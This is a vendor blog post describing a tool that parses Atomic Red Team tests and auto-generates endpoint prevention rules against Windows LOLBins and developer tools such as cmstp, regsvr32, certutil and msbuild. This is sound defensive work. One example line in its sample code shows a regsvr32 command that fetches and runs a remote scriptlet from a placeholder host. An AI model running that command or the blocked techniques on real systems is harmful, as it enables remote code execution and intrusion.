The following article originally appeared on the Carbon Black blog. The author, Jimmy Astle, is a senior threat researcher at Carbon Black and a speaker on the upcoming webinar: Testing Visibility to Develop an Innovative Threat Hunting Program.

MITRE ATT&CK is arguably one of the best assets available to security professionals who want to dive into the intricacies of detecting and preventing adversary behaviors. We can leverage ATT&CK as the foundational knowledge base to pull from when researching attackers’ behaviors in a post-compromise world. But what would a specific attack look like when executed in your own testbed and mapped directly to a MITRE ATT&CK technique?

The folks at Red Canary have done an awesome job of putting together Atomic Red Team, a nicely organized set of unit tests that let you test your detection capabilities. For example, let’s say you want to know whether you have the visibility to detect something like a privilege escalation via the CMSTP COM provider. You can head over to the T1191 Atomic Red Team test and execute, observe, create detection rules, and repeat.

Through this applied detection research, you might notice that CMSTP.exe is what the industry has coined an “LOLBin” (short for living-off-the-land binary). This is a binary that ships in Windows, is signed by Microsoft, and can proxy code execution on behalf of another process. You might also notice that the binary has never executed in your environment, so why even let your shiny new detection technique get exercised? Let’s just minimize this attack vector altogether.

Atomic Testing Exercise

Recently, Carbon Black ran an internal hackathon and I decided to have some fun with Red Canary’s Atomic Red Team and Cb Defense prevention rules. I internally dubbed this tool “Atomic Blue Team.” The idea was to automatically parse out the atomic YAML files, bucket the attack vectors into adversary techniques, and automatically create prevention rules in Cb Defense to disallow the atomic executors from completing successfully.

If you haven’t yet dug into the atomic YAML files, there is a common set of data that you can leverage. At a high level, I started by parsing out only the atomic tests I was studying for this hackathon project: those that target Windows. After that, I broke down the tests by their executors, which produced buckets such as command-interpreters, LOLBins, and dev_tools. After finding the eligible test cases, I then cross-referenced the observed behaviors in each atomic test against the prevention capabilities provided natively in Cb Defense via our policy automation APIs.
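The filtering and bucketing steps described above can be sketched roughly as follows. This is a minimal illustration, not the code from the hackathon project: it assumes the atomic YAML has already been loaded into a Python dict (for example with a YAML parser), that each test carries `supported_platforms` and an `executor` with a `command` string, and the contents of `BUCKETS` as well as the helper names `binaries_in` and `bucket_windows_tests` are hypothetical.

```python
import re
from collections import defaultdict

# Hypothetical bucket membership. The article names the buckets,
# but which binaries belong to each one is an assumption here.
BUCKETS = {
    "command_interpreters": {"cmd", "powershell", "wscript", "cscript"},
    "lolbins": {"cmstp", "rundll32", "regsvr32", "certutil", "pcalua", "forfiles"},
    "dev_tools": {"csc", "installutil", "msbuild", "regasm"},
}


def binaries_in(command):
    """Return lowercase tokens from a command line, with any .exe suffix removed."""
    tokens = re.split(r"[\s\\/\"']+", command.lower())
    return {t[:-4] if t.endswith(".exe") else t for t in tokens if t}


def bucket_windows_tests(technique):
    """Group the Windows tests of one parsed atomic file by the binaries they invoke."""
    buckets = defaultdict(list)
    for test in technique.get("atomic_tests", []):
        # Skip anything that does not target Windows.
        if "windows" not in test.get("supported_platforms", []):
            continue
        command = test.get("executor", {}).get("command", "")
        found = binaries_in(command)
        for bucket, names in BUCKETS.items():
            for binary in sorted(found & names):
                buckets[bucket].append(
                    (technique["attack_technique"], test["name"], binary)
                )
    return dict(buckets)


# Illustrative stand-in for one parsed atomic YAML file (test names are made up).
sample = {
    "attack_technique": "T1191",
    "display_name": "CMSTP",
    "atomic_tests": [
        {
            "name": "Illustrative CMSTP test",
            "supported_platforms": ["windows"],
            "executor": {"name": "command_prompt", "command": "cmstp.exe /s T1191.inf"},
        },
        {
            "name": "Illustrative Linux test",
            "supported_platforms": ["linux"],
            "executor": {"name": "sh", "command": "echo hello"},
        },
    ],
}

print(bucket_windows_tests(sample))
```

Matching on binary names inside the command string is a deliberately crude heuristic; a real parser would likely need to handle input arguments, environment variables, and multi-line commands.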

So what does this end up looking like for Windows eligible test cases? Awesome question.

Following are some of the suggested rules generated by this project:

Generating LOLBin Rules

cmstp is being used to execute code
Indicator for command_interpreter attempting to make netconns
rundll32 wants to invoke cmd-interp
Indicator for command_interpreter attempting to make netconns
regsvr32 want to make a netconn
regsvr32 is loading sketchy stuff too!
Indicator for command_interpreter attempting to make netconns
certutil wants to make a netconn
pcalua is being used to execute code
forfiles is being used to execute code

Generating Dev Tools Rules

csc is being used to compile/execute payloads
installutil is being used to execute code
MSbuild is being used to execute code
csc is being used to compile/execute payloads
regasm is being used to execute code
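To give a feel for how suggestions like these might be produced, here is a small sketch that turns observed (binary, command) pairs into rule suggestions. Everything in it is an assumption for illustration: the rule fields (`application`, `operation`, `action`, `reason`) are not the Cb Defense policy schema, the URL check is a stand-in heuristic for "makes a network connection", and the function names are hypothetical.

```python
def suggest_rule(binary, command):
    """Build one illustrative deny-rule suggestion for a binary seen in an atomic command."""
    lowered = command.lower()
    # Assumed heuristic: a URL in the command implies a network connection.
    if "http://" in lowered or "https://" in lowered:
        operation = "network"
        reason = f"{binary} wants to make a netconn"
    else:
        operation = "execute_code"
        reason = f"{binary} is being used to execute code"
    return {
        "application": f"{binary}.exe",
        "operation": operation,
        "action": "deny",
        "reason": reason,
    }


def suggest_rules(observations):
    """Turn (binary, command) pairs into de-duplicated suggestions, preserving order."""
    seen = set()
    rules = []
    for binary, command in observations:
        rule = suggest_rule(binary, command)
        key = (rule["application"], rule["operation"])
        if key not in seen:
            seen.add(key)
            rules.append(rule)
    return rules


# Illustrative observations; the commands and URL are placeholders.
observations = [
    ("cmstp", "cmstp.exe /s T1191.inf"),
    ("regsvr32", "regsvr32.exe /s /u /i:https://example.com/payload.sct scrobj.dll"),
    ("cmstp", "cmstp.exe /s another.inf"),
]

for rule in suggest_rules(observations):
    print(rule["reason"])
```

De-duplicating on the (application, operation) pair keeps one suggestion per behavior even when several atomic tests exercise the same binary.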



Here’s an example of what a subset of the policy looks like in Cb Defense:

The Power of Unit Testing

This is a great showing of security unit testing in a “red versus blue” context. Oftentimes we nerd out on the intricacies of our payloads, delivery mechanisms, and command and control infrastructure. However, with machine-readable attacker TTP definitions, we can quickly iterate on various detection and prevention techniques without needing to take the time to exercise the entire kill chain.

So is this proof-of-concept rule generation meant to block all the things? Of course not; it is meant to showcase the power of unit testing when applied to red versus blue. When evaluating security products, be sure to not only look at the immediate features in front of you, but also the flexibility of the security tooling. Are you able to talk to an API to automatically put in new detection/prevention rules? Can you automatically take remediation actions when certain behaviors are observed on an endpoint?

We have come a long way in the security testing space and have much more progress to make, but I truly believe this type of automated testing is the future of detection, prevention, and resiliency.

Parts of this code base have been open-sourced here: https://github.com/JimmyAstle/Atomic-Parser
